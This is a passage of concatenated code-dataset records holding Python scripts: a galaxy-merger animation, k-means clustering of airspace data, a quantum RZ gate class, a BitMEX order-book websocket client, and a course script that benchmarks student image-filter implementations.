euler_angles=np.array([[1.47,0.0,0.0]]),\n t_max=1.0, nt=1001, num_rings=5, save=False, check_n=False)\n'''\n\n# galaxy merger with galactic discs in the yz plane\nsolution, num_galaxies, n_total, nt = main.main(num_galaxies=2, galaxy_pos=np.array([[-2,-5,0],[2,5,0]]),\n galaxy_vel=np.array([[0,3,0],[0,-3,0]]),\n euler_angles=np.array([[0,0,0],[0,np.pi/2,0]]),\n t_max=5, nt=2001, r_outer=2, num_rings=1,\n check_n=True)\n\n\nn_total = np.shape(solution['y'])[0]//2-num_galaxies\nt_max = np.max(solution['t'])\nnt = np.size(solution['t'])\n\n# initialization function for animation\ndef init_animate():\n for i in range(num_galaxies):\n cent_bodies[i].set_data([], [])\n point_bodies[i].set_data([], [])\n time_text[0].set_text('')\n return patches\n\n# what to animate at every frame\ndef animate(i):\n # scaling speeds up the animation\n i*=animation_speed_scaling\n # plot the trajectories at given frame\n x_cent = np.zeros(num_galaxies)\n y_cent = np.zeros(num_galaxies)\n x = np.zeros(n_total)\n y = np.zeros(n_total)\n # set up data pairs for animations of all point bodies\n j_sol = num_galaxies*2\n for j in range(n_total):\n x[j] = solution['y'][j_sol, 0][i]\n y[j] = solution['y'][j_sol, 1][i]\n j_sol += 2\n # loop across all galaxies\n last_index = 0\n for j in range(num_galaxies):\n x_cent[j] = solution['y'][2*j,0][i]\n y_cent[j] = solution['y'][2*j,1][i]\n # update the artists; the complicated indexing is just to identify\n # which point bodies are associated with which galaxy\n cent_bodies[j].set_data(x_cent[j], y_cent[j])\n next_index = n_total*(j+1)//num_galaxies\n point_bodies[j].set_data(x[last_index:next_index],\n y[last_index:next_index])\n last_index = next_index\n # change the text to reflect current age\n time_text[0].set_text('years: ' + format(solution['t'][i],'.2'))\n return patches\n\ndef plot_bounds():\n x_min = np.min(solution['y'][::2,0,:]) - x_spacing\n x_max = np.max(solution['y'][::2,0,:]) + x_spacing\n y_min = np.min(solution['y'][::2,1,:]) - y_spacing\n y_max = np.max(solution['y'][::2,1,:]) + y_spacing\n return np.array([x_min, x_max, y_min, y_max])\n\ndef SaveAnimation(file_name, writer, fps=60, bitrate=-1):\n print('Saving animation')\n # create new animation file name, if one does not exist already\n if file_name == '':\n file_name = main.FileName('ani', animation_dir, data_type = '.gif')\n # save animation as gif using imagemagick\n animation.save(animation_dir + '/' + file_name,\n writer=writer, fps=fps, bitrate=bitrate,\n metadata=dict(artist='Chico_Astro'))\n\n# In[0]\n'''\nPLOTTING\n'''\n# setting plotting options\ngrid_style = { 'alpha' : '0.75',\n 'linestyle' : ':' }\nlegend_style = { 'fontsize' : '10' }\nfont_syle = { 'size' : '14' }\nmpl.rc( 'font', **font_syle)\nmpl.rc( 'grid', **grid_style)\nmpl.rc('legend', **legend_style)\n \nfig, ax=plt.subplots(1,1, figsize=(8,4))\n# initialize points to represent bodies and text to be animated\n# central bodies\ncent_body1, = [plt.plot([], [], 'ok')]\ncent_body2, = [plt.plot([], [], 'or')]\ncent_bodies = cent_body1 + cent_body2\n# point bodies\npoint_bodies1, = [plt.plot([], [], '.k')]\npoint_bodies2, = [plt.plot([], [], '.r')]\npoint_bodies = point_bodies1 + point_bodies2\n# text\ntime_text = [plt.text(0.15, 0.15, '', transform=plt.gcf().transFigure)]\npatches = cent_bodies + point_bodies + time_text\n# animate\nanimation = ani.FuncAnimation(fig, animate, init_func=init_animate,\n frames=nt//animation_speed_scaling,\n interval=10, blit=True)\n# determine plot bounds\nax.grid()\nbounds = plot_bounds()\nplt.xlim(bounds[0], bounds[1])\nplt.ylim(bounds[2], bounds[3])\nplt.xlabel('x (AU)')\nplt.ylabel('y (AU)')\nax.set_facecolor('whitesmoke')\nax.patch.set_alpha(0.1)\n\n# In[1]\n","sub_path":"animate6.py","file_name":"animate6.py","file_ext":"py","file_size_in_byte":6003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"452478497","text":"from typing import List, Any\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nfrom sklearn.cluster import KMeans\n\nfileName = 't1.txt'\n\nK = 35\n# The number of Cluster\n\nN = 300\n# The number of iterate times\n\nDistance_per_point = 5\n# set a point per airline\n\n\nw1 = 80\n# the importance of distance between two points\n\nw2 = 70\n# the importance of airplanes number\n\nclass Airplane:\n name = \"null\"\n # the name of this point\n type = 0\n # the type 1 for airlines 2 for airport\n\n belong = np.zeros(K, dtype=np.int_, order='C')\n # the number belongs to every cluster\n # would be 00001000 e.t.c for point\n # would be 10204005 e.t.c for airlines\n\n cluster = 1\n # belong to which Cluster\n\n Fcoord = np.zeros(2, dtype=np.float_, order='C')\n Tcoord = np.zeros(2, dtype=np.float_, order='C')\n # Coord from && to\n\n data = np.zeros(34, dtype=np.float_, order='C')\n\n def __init__(self, tlist):\n self.name = tlist[0]\n self.type = int(tlist[1])\n self.Fcoord = np.asarray(tlist[2:4], dtype=np.float_)\n self.Tcoord = np.asarray(tlist[4:6], dtype=np.float_)\n self.data = np.asarray(tlist[6:], dtype=np.float_)\n\n # update Cluster\n def updataBelong(self):\n tCluster = self.cluster\n temp = 0\n for index, item in enumerate(self.belong):\n if (temp < item):\n temp = item\n tCluster = index\n self.cluster = tCluster\n\n def display(self):\n print(self.name, self.type, self.Fcoord, self.Tcoord, self.data)\n\n\nclass Point:\n\n def __init__(self, air: Airplane, Coord=np.zeros(2, dtype=np.float_), parent=0):\n self.data = air.data\n self.name = air.name\n self.coord = np.zeros(2, dtype=np.float_)\n self.coord = Coord\n self.parent = parent\n self.type = air.type\n\n def display(self):\n print(self.name, self.coord, self.belongsTo, self.data, self.color)\n\n def mkData(self, left, right):\n self.cData = np.zeros(36, dtype=np.float_)\n self.cData[:2] = self.coord * w1\n self.cData[2+left*2:4+right*2] = self.data[left*2:2+right*2]\n for index,i in enumerate(self.cData):\n if index > 1 and index % 2 == 1:\n self.cData[index] *= w2\n\n\nairsList = [] # type: list[Airplane]\npointList = [] # type: list[point]\nPointN = 0\nansList = []\n\n\n# read data from file\ndef readFile():\n file = open(fileName)\n FileContex = file.readlines()\n for i in FileContex:\n tlist = i.split(' ')\n airsList.append(Airplane(tlist))\n\n\n# calc Euclidean Distance for vector\ndef calcDis(Veca, Vecb):\n return np.linalg.norm(Veca - Vecb)\n\n\ndef mkPoint():\n global PointN\n global pointList\n global airsList\n for index, i in enumerate(airsList):\n if i.type == 0:\n pointList.append(Point(i, parent=index, Coord=i.Fcoord))\n PointN += 1\n else:\n From = i.Fcoord\n To = i.Tcoord\n delta = To - From\n pointNumber = calcDis(From, To) / Distance_per_point\n pointNumber = int(pointNumber)\n delta /= pointNumber\n for j in range(pointNumber):\n Coord = From + delta * j\n pointList.append(Point(i, parent=index, Coord=Coord))\n PointN += 1\n pointList.append(Point(i, parent=index, Coord=To))\n PointN += 1\n\n\ndef mkPic(l,r,ans):\n ax = plt.subplot(1, 1, 1, projection='3d')\n ax.set_xlabel('longitude')\n ax.set_ylabel('latitude')\n ax.set_zlabel('data')\n clist = []\n dlist = []\n for i in DATA[ans]:\n clist.append(i.coord.tolist())\n\n rlist = []\n c = []\n nameL = []\n sum = 0\n p:Point\n for i in pointList:\n i.mkData(l - 6, r - 7)\n t = np.sum(i.cData[2:])\n if i.coord.tolist() in clist:\n c.append(1)\n if sum < t:\n sum = t\n p = i\n else:\n c.append(0)\n rlist.append(i.coord)\n dlist.append(t)\n nameL.append(i.name)\n\n rlist = np.asarray(rlist,dtype=np.float_)\n ax.scatter(rlist[:,0], rlist[:,1],dlist,c=c)\n tlist = []\n for index,i in enumerate(nameL):\n if not i in tlist:\n tlist.append(i)\n ax.text(rlist[index][0],rlist[index][1],dlist[index],i)\n\n print('CHOSEN: ')\n print(p.name + ' ' + str(p.coord))\n\n\n\ndef k_means(left=0, right=17):\n cList = []\n pList = []\n i: Point\n for index, i in enumerate(pointList):\n pointList[index].mkData(left, right)\n pList.append(i.parent)\n cList.append(pointList[index].cData)\n cList = np.asarray(cList, dtype=np.float_)\n result = KMeans(n_clusters=K, max_iter=N).fit_predict(cList)\n # print(result)\n a = []\n for i in range(K):\n a.append([])\n for index, j in enumerate(result):\n a[j].append(np.sum(np.asarray(cList[index][2:])))\n\n c = []\n cc = []\n for i in a:\n c.append(np.mean(np.asarray(i)))\n cc.append(np.mean(np.asarray(i)))\n\n tpos = np.argmax(np.asarray(c))\n tnum = cc[tpos]\n sum = 0\n for i in cc:\n sum += tnum - i;\n\n slist = []\n dlist = []\n for index, i in enumerate(result):\n if i == tpos:\n slist.append(index)\n dlist.append(pointList[index])\n\n return sum, slist, dlist\n\n\nSUM = []\nRESULT = []\nDATA = []\n\n\ndef main_process():\n index = 0\n for l in range(17):\n for r in range(l, 17):\n tSum, tResult, tDATA = k_means(l, r)\n SUM.append(tSum)\n RESULT.append(tResult)\n DATA.append(tDATA)\n index += 1\n print(float(index / 153 * 100), '% has done')\n\n\ndef query(op=1, len=1, left=6, right=7):\n\n ans = 0\n left = left - 6\n right = right - 7\n ansl = left\n ansr = right\n index = 0\n if op == 1: # [L,R]\n for l in range(17):\n for r in range(l, 17):\n if l == left and r == right:\n ans = index\n index += 1\n\n if op == 2:\n tsum = 0\n for l in range(17):\n for r in range(l, 17):\n if r - l + 1 <= len:\n if tsum < SUM[index]:\n tsum = SUM[index]\n ans = index\n ansl = l\n ansr = r\n index += 1\n return ans,ansl+6,ansr+7\n\nreadFile()\nmkPoint()\nmain_process()\nprint('The number of POINTs is:', str(PointN))\nprint('The number of CLUSTERs is:', str(K))\nwhile(True):\n op = int(input())\n tl = 0\n tr = 0\n tlen = 0\n if(op == 1):\n tl = int(input())\n tr = int(input())\n else:\n tlen = int(input())\n ans,l,r = query(op=op,left=tl,right=tr,len=tlen)\n mkPic(l,r,ans)\n print(l,r)\n for i in DATA[ans]:\n print(i.name + ' ' + str(i.coord))\n plt.show()\n","sub_path":"异常空域单元识别/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"240237950","text":"\"\"\"This module implements the RZGate.\"\"\"\nfrom __future__ import annotations\n\nfrom typing import Sequence\n\nimport numpy as np\n\nfrom bqskit.ir.gates.qubitgate import QubitGate\nfrom bqskit.qis.unitary.differentiable import DifferentiableUnitary\nfrom bqskit.qis.unitary.unitarymatrix import UnitaryMatrix\n\n\nclass RZGate(QubitGate, DifferentiableUnitary):\n \"\"\"A gate representing an arbitrary rotation around the Z axis.\"\"\"\n\n size = 1\n num_params = 1\n qasm_name = 'rz'\n\n def get_unitary(self, params: Sequence[float] = []) -> UnitaryMatrix:\n \"\"\"Returns the unitary for this gate, see Unitary for more info.\"\"\"\n self.check_parameters(params)\n\n pexp = np.exp(1j * params[0] / 2)\n nexp = np.exp(-1j * params[0] / 2)\n\n return UnitaryMatrix(\n [\n [nexp, 0],\n [0, pexp],\n ],\n )\n\n def get_grad(self, params: Sequence[float] = []) -> np.ndarray:\n \"\"\"Returns the gradient for this gate, see Gate for more info.\"\"\"\n self.check_parameters(params)\n\n dpexp = 1j * np.exp(1j * params[0] / 2) / 2\n dnexp = -1j * np.exp(-1j * params[0] / 2) / 2\n\n return np.array(\n [\n [\n [dnexp, 0],\n [0, dpexp],\n ],\n ], dtype=np.complex128,\n )\n","sub_path":"bqskit/ir/gates/parameterized/rz.py","file_name":"rz.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"505412923","text":"import json\nimport logging\nimport math\nimport threading\nimport traceback\nfrom time import sleep\nfrom urllib.parse import urlunparse, urlparse\n\nimport websocket\n\nfrom bitmex_tools.order_book_l2 import OrderBookL2\n\nlogger = logging.getLogger(__name__)\n\n\nclass BitMEXWebsocket:\n # Don't grow a table larger than this amount. Helps cap memory usage.\n MAX_TABLE_LEN = 200\n\n def __init__(self, endpoint, symbol, api_key=None, api_secret=None):\n \"\"\"Connect to the websocket and initialize data stores.\"\"\"\n logger.debug('Initializing WebSocket.')\n\n self.endpoint = endpoint\n self.symbol = symbol\n\n if api_key is not None and api_secret is None:\n raise ValueError('api_secret is required if api_key is provided')\n if api_key is None and api_secret is not None:\n raise ValueError('api_key is required if api_secret is provided')\n\n self.api_key = api_key\n self.api_secret = api_secret\n\n self.data = {}\n self.keys = {}\n self.exited = False\n\n self.order_book_l2 = OrderBookL2()\n\n # We can subscribe right in the connection querystring, so let's build that.\n # Subscribe to all pertinent endpoints\n wsURL = self.__get_url()\n logger.info('Connecting to %s' % wsURL)\n self.__connect(wsURL)\n logger.info('Connected to WS.')\n\n def exit(self):\n \"\"\"Call this to exit - will close websocket.\"\"\"\n self.exited = True\n self.ws.close()\n\n def get_instrument(self):\n \"\"\"Get the raw instrument data for this symbol.\"\"\"\n # Turn the 'tickSize' into 'tickLog' for use in rounding\n instrument = self.data['instrument'][0]\n instrument['tickLog'] = int(math.fabs(math.log10(instrument['tickSize'])))\n return instrument\n\n def __connect(self, wsURL):\n \"\"\"Connect to the websocket in a thread.\"\"\"\n logger.debug('Starting thread')\n\n self.ws = websocket.WebSocketApp(wsURL,\n on_message=self.__on_message,\n on_close=self.__on_close,\n on_open=self.__on_open,\n on_error=self.__on_error\n )\n\n self.wst = threading.Thread(target=lambda: self.ws.run_forever())\n self.wst.daemon = True\n self.wst.start()\n logger.debug('Started thread')\n\n # Wait for connect before continuing\n conn_timeout = 5\n while not self.ws.sock or not self.ws.sock.connected and conn_timeout:\n sleep(1)\n conn_timeout -= 1\n if not conn_timeout:\n logger.error('Couldnt connect to WS! Exiting.')\n self.exit()\n raise websocket.WebSocketTimeoutException('Couldnt connect to WS! Exiting.')\n\n def __get_url(self):\n \"\"\"\n Generate a connection URL. We can define subscriptions right in the querystring.\n Most subscription topics are scoped by the symbol we're listening to.\n \"\"\"\n\n # You can sub to orderBookL2 for all levels, or orderBookL2 for top 10 levels & save bandwidth\n symbolSubs = ['orderBookL2']\n genericSubs = ['margin']\n\n subscriptions = [sub + ':' + self.symbol for sub in symbolSubs]\n subscriptions += genericSubs\n\n urlParts = list(urlparse(self.endpoint))\n urlParts[0] = urlParts[0].replace('http', 'ws')\n urlParts[2] = '/realtime?subscribe={}'.format(','.join(subscriptions))\n return urlunparse(urlParts)\n\n def __wait_for_account(self):\n \"\"\"On subscribe, this data will come down. Wait for it.\"\"\"\n # Wait for the keys to show up from the ws\n while not {'margin', 'position', 'order', 'orderBookL2'} <= set(self.data):\n sleep(0.1)\n\n def __wait_for_symbol(self, symbol):\n \"\"\"On subscribe, this data will come down. Wait for it.\"\"\"\n while not {'instrument', 'trade', 'quote'} <= set(self.data):\n sleep(0.1)\n\n def __send_command(self, command, args=None):\n \"\"\"Send a raw command.\"\"\"\n if args is None:\n args = []\n self.ws.send(json.dumps({'op': command, 'args': args}))\n\n def __on_message(self, ws, message):\n message = json.loads(message)\n logger.debug(json.dumps(message))\n table = message['table'] if 'table' in message else None\n action = message['action'] if 'action' in message else None\n try:\n if 'subscribe' in message:\n logger.debug('Subscribed to %s.' % message['subscribe'])\n elif action:\n if table not in self.data:\n self.data[table] = []\n self.order_book_l2.message(message)\n except:\n logger.error(traceback.format_exc())\n\n def __on_error(self, ws, error):\n \"\"\"Called on fatal websocket errors. We exit on these.\"\"\"\n print('Bitmex socket had a problem', self.symbol, error)\n wsURL = self.__get_url()\n print('Connecting to %s' % wsURL)\n self.__connect(wsURL)\n print('Connected to WS.')\n # if not self.exited:\n # logger.error('Error : %s' % error)\n # raise websocket.WebSocketException(error)\n\n def __on_open(self, ws):\n \"\"\"Called when the WS opens.\"\"\"\n logger.debug('Websocket Opened.')\n\n def __on_close(self, ws):\n \"\"\"Called on websocket close.\"\"\"\n logger.info('Websocket Closed')\n\n\nif __name__ == '__main__':\n a = BitMEXWebsocket(endpoint='wss://www.bitmex.com/realtime', symbol='XBTUSD')\n last_bbo = None\n while True:\n new_bbo = a.order_book_l2.bbo()\n if new_bbo != last_bbo:\n last_bbo = new_bbo\n print(new_bbo)\n sleep(0.0001)\n","sub_path":"bitmex_tools/sockets/bitmex_socket_orderbookL2.py","file_name":"bitmex_socket_orderbookL2.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"372512388","text":"#!/usr/bin/env python3\nimport re\nimport statistics\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom termcolor import colored\nfrom libtest import *\n\nif not os.path.exists(TESTINDIR):\n print(colored('ERROR: Debe correr primero el script %s'%(PRIMER_SCRIPT), 'red'))\n exit()\n\n\n# Funciones para correr filtros y capturar salidas de pantalla para extraer mediciones...\n\ndef catedra_consola(filtro, implementacion, archivo_in, extra_params, salida_consola):\n salida_consola_a = subprocess.Popen([TP2ALU,filtro,\"-i\",implementacion,\"-o\",CATEDRADIR + \"/ \", archivo_in,extra_params],stdout=subprocess.PIPE)\n salida_consola_b = salida_consola_a.communicate()[0]\n salida_consola.append(salida_consola_b.decode('utf-8').strip())\n\ndef alumnos_consola(filtro, implementacion, archivo_in, extra_params, salida_consola):\n salida_consola_a = subprocess.Popen([TP2ALU,filtro,\"-i\",implementacion,\"-o\",CATEDRADIR + \"/ \", archivo_in,extra_params],stdout=subprocess.PIPE)\n salida_consola_b = salida_consola_a.communicate()[0]\n salida_consola.append(salida_consola_b.decode('utf-8').strip())\n\n\n\nCant_medidiones = 60 # Cantidad de mediciones por experimento\n\n\nnombre = ''\nOcultar_nombre = ''\nDescubrir_nombre = ''\n\nprint(colored('Se determinan archivos a testear...', 'blue'))\nimgs = archivos_tests()\nimgs.sort()\nimg0Prim = imgs[0:1]\nimg1PrimInd1 = len(imgs)/2\nimg1PrimInd2 = img1PrimInd1 + 1\nimg1Prim = imgs[int(img1PrimInd1):int(img1PrimInd2)]\n\nnombre = img0Prim[0]\nOcultar_nombre = img1Prim[0]\nDescubrir_nombre = img0Prim[0] + \".Ocultar.ASM.bmp\"\n\nprint(colored('Se realizan mediciones...', 'blue'))\n\n\n# Ocultar\n\nc___catedra_consola_Ocultar = []\nasm_alumnos_consola_Ocultar = []\n\nc___catedra_mediciones_Ocultar = []\nasm_alumnos_mediciones_Ocultar = []\n\n# Se ejecuta Ocultar (asm alumnos)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)) + ', Tamaño contenedor img1Prim = ' + str(len(img1Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Ocultar, implementación asm de alumnos sobre imagen ' + str(i) + ' ('+ img0Prim[i] + \", \" + img1Prim[i] + \") ... \" )\n alumnos_consola('Ocultar', 'asm', TESTINDIR + \"/\" + img0Prim[i], TESTINDIR + \"/\" + img1Prim[i], asm_alumnos_consola_Ocultar)\n\nprint('')\n\n# Se ejecuta Ocultar (c cátedra)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)) + ', Tamaño contenedor img1Prim = ' + str(len(img1Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Ocultar, implementación c de cátedra, sobre imagen ' + str(i) + ' (' + img0Prim[i] + \", \" + img1Prim[i] + \") ... \" )\n catedra_consola('Ocultar', 'c', TESTINDIR + \"/\" + img0Prim[i], TESTINDIR + \"/\" + img1Prim[i], c___catedra_consola_Ocultar)\n\n\n# Descubrir\n\nc___catedra_consola_Descubrir = []\nasm_alumnos_consola_Descubrir = []\n\nc___catedra_mediciones_Descubrir = []\nasm_alumnos_mediciones_Descubrir = []\n\n# Se ejecuta Descubrir (asm alumnos)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Descubrir, implementación asm de alumnos sobre imagen ' + str(i) + ' ('+ img0Prim[i] + \") ... \" )\n alumnos_consola('Descubrir', 'asm', CATEDRADIR + \"/\" + img0Prim[i] + \".Ocultar.ASM.bmp\", '', asm_alumnos_consola_Descubrir)\n\nprint('')\n\n# Se ejecuta Descubrir (c cátedra)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Descubrir, implementación c de cátedra, sobre imagen ' + str(i) + ' (' + img0Prim[i] + \") ... \" )\n catedra_consola('Descubrir', 'c', CATEDRADIR + \"/\" + img0Prim[i] + \".Ocultar.ASM.bmp\", '', c___catedra_consola_Descubrir)\n\n\n\n# Zigzag\n\nc___catedra_consola_Zigzag = []\nasm_alumnos_consola_Zigzag = []\n\nc___catedra_mediciones_Zigzag = []\nasm_alumnos_mediciones_Zigzag = []\n\n# Se ejecuta Zigzag (asm alumnos)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Zigzag, implementación asm de alumnos sobre imagen ' + str(i) + ' ('+ img0Prim[i] + \") ... \" )\n alumnos_consola('Zigzag', 'asm', TESTINDIR + \"/\" + img0Prim[i], '', asm_alumnos_consola_Zigzag)\n\nprint('')\n\n# Se ejecuta Zigzag (c cátedra)\n\nfor i in range(len(img0Prim)):\n #print('Indice = ' + str(i) + ', Tamaño contenedor img0Prim = ' + str(len(img0Prim)))\n for j in range(Cant_medidiones-1):\n print ('Se ejecuta filtro Zigzag, implementación c de cátedra, sobre imagen ' + str(i) + ' (' + img0Prim[i] + \") ... \" )\n catedra_consola('Zigzag', 'c', TESTINDIR + \"/\" + img0Prim[i], '', c___catedra_consola_Zigzag)\n\n\n\nprint(colored('\\nSe listan salidas de consola capturadas...\\n', 'green'))\n\n\nprint(colored(\"\\nLecturas de consola Ocultar c catedra...\\n\", 'blue'))\nprint('\\n'.join(c___catedra_consola_Ocultar))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Ocultar asm alumnos...\\n\", 'blue'))\nprint('\\n'.join(asm_alumnos_consola_Ocultar))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Descubrir c catedra...\\n\", 'blue'))\nprint('\\n'.join(c___catedra_consola_Descubrir))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Descubrir asm alumnos...\\n\", 'blue'))\nprint('\\n'.join(asm_alumnos_consola_Descubrir))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Zigzag c catedra...\\n\", 'blue'))\nprint('\\n'.join(c___catedra_consola_Zigzag))\nprint(\"\\n\")\n\nprint(colored(\"\\nLecturas de consola Zigzag asm alumnos...\\n\", 'blue'))\nprint('\\n'.join(asm_alumnos_consola_Zigzag))\nprint(\"\\n\")\n\n\n\nprint(colored('\\nSe extraen mediciones de salidas de consola capturadas y se las lista...\\n', 'green'))\n\n\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar c de cátedra sobre imágenes \" + nombre + \", \" + Ocultar_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(c___catedra_consola_Ocultar)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',c___catedra_consola_Ocultar[i])\n c___catedra_mediciones_Ocultar.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nc___catedra_promedio_Ocultar = statistics.mean(c___catedra_mediciones_Ocultar)\nprint(\"Promedio = \" + str(c___catedra_promedio_Ocultar))\nc___catedra_desvioEs_Ocultar = statistics.stdev(c___catedra_mediciones_Ocultar)\nprint(\"Desvío estándar = \" + str(c___catedra_desvioEs_Ocultar))\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar asm de alumnos sobre imágenes \" + nombre + \", \" + Ocultar_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(asm_alumnos_consola_Ocultar)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',asm_alumnos_consola_Ocultar[i])\n asm_alumnos_mediciones_Ocultar.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nasm_alumnos_promedio_Ocultar = statistics.mean(asm_alumnos_mediciones_Ocultar)\nprint(\"Promedio = \" + str(asm_alumnos_promedio_Ocultar))\nasm_alumnos_desvioEs_Ocultar = statistics.stdev(asm_alumnos_mediciones_Ocultar)\nprint(\"Desvío estándar = \" + str(asm_alumnos_desvioEs_Ocultar))\n\n\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir c de cátedra sobre imagen \" + Descubrir_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(c___catedra_consola_Descubrir)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',c___catedra_consola_Descubrir[i])\n c___catedra_mediciones_Descubrir.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nc___catedra_promedio_Descubrir = statistics.mean(c___catedra_mediciones_Descubrir)\nprint(\"Promedio = \" + str(c___catedra_promedio_Descubrir))\nc___catedra_desvioEs_Descubrir = statistics.stdev(c___catedra_mediciones_Descubrir)\nprint(\"Desvío estándar = \" + str(c___catedra_desvioEs_Descubrir))\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir asm de alumnos sobre imagen \" + Descubrir_nombre + \"\\n\", 'blue'))\n\nfor i in range(len(asm_alumnos_consola_Descubrir)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',asm_alumnos_consola_Descubrir[i])\n asm_alumnos_mediciones_Descubrir.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nasm_alumnos_promedio_Descubrir = statistics.mean(asm_alumnos_mediciones_Descubrir)\nprint(\"Promedio = \" + str(asm_alumnos_promedio_Descubrir))\nasm_alumnos_desvioEs_Descubrir = statistics.stdev(asm_alumnos_mediciones_Descubrir)\nprint(\"Desvío estándar = \" + str(asm_alumnos_desvioEs_Descubrir))\n\n\n\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag c de cátedra sobre imagen \" + nombre + \"\\n\", 'blue'))\n\nfor i in range(len(c___catedra_consola_Zigzag)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',c___catedra_consola_Zigzag[i])\n c___catedra_mediciones_Zigzag.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nc___catedra_promedio_Zigzag = statistics.mean(c___catedra_mediciones_Zigzag)\nprint(\"Promedio = \" + str(c___catedra_promedio_Zigzag))\nc___catedra_desvioEs_Zigzag = statistics.stdev(c___catedra_mediciones_Zigzag)\nprint(\"Desvío estándar = \" + str(c___catedra_desvioEs_Zigzag))\n\nprint(colored(\"\\n\" + str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag asm de alumnos sobre imagen \" + nombre + \"\\n\", 'blue'))\n\nfor i in range(len(asm_alumnos_consola_Zigzag)):\n extracciones = re.search(' # de ciclos insumidos totales : (.+?)\\n',asm_alumnos_consola_Zigzag[i])\n asm_alumnos_mediciones_Zigzag.append(float(extracciones.group(1)))\n print (extracciones.group(1))\nprint()\nasm_alumnos_promedio_Zigzag = statistics.mean(asm_alumnos_mediciones_Zigzag)\nprint(\"Promedio = \" + str(asm_alumnos_promedio_Zigzag))\nasm_alumnos_desvioEs_Zigzag = statistics.stdev(asm_alumnos_mediciones_Zigzag)\nprint(\"Desvío estándar = \" + str(asm_alumnos_desvioEs_Zigzag))\n\n\n\n\nwith open('Medicion_Ocultar_catedra_' + Ocultar_nombre + \"_en_\" + nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar c de cátedra sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,c___catedra_mediciones_Ocultar)))\n archivo.write(\"\\nPromedio = \" + str(c___catedra_promedio_Ocultar))\n archivo.write(\"\\nDesvío estándar = \" + str(c___catedra_desvioEs_Ocultar))\n\nwith open('Medicion_Ocultar_alumnos_' + Ocultar_nombre + \"_en_\" + nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Ocultar asm de alumnos sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,asm_alumnos_mediciones_Ocultar)))\n archivo.write(\"\\nPromedio = \" + str(asm_alumnos_promedio_Ocultar))\n archivo.write(\"\\nDesvío estándar = \" + str(asm_alumnos_desvioEs_Ocultar))\n\n\nwith open('Medicion_Descubrir_catedra_' + Descubrir_nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir c de cátedra sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,c___catedra_mediciones_Descubrir)))\n archivo.write(\"\\nPromedio = \" + str(c___catedra_promedio_Descubrir))\n archivo.write(\"\\nDesvío estándar = \" + str(c___catedra_desvioEs_Descubrir))\n\nwith open('Medicion_Descubrir_alumnos_' + Descubrir_nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Descubrir asm de alumnos sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,asm_alumnos_mediciones_Descubrir)))\n archivo.write(\"\\nPromedio = \" + str(asm_alumnos_promedio_Descubrir))\n archivo.write(\"\\nDesvío estándar = \" + str(asm_alumnos_desvioEs_Descubrir))\n\n\nwith open('Medicion_Zigzag_catedra_' + nombre + 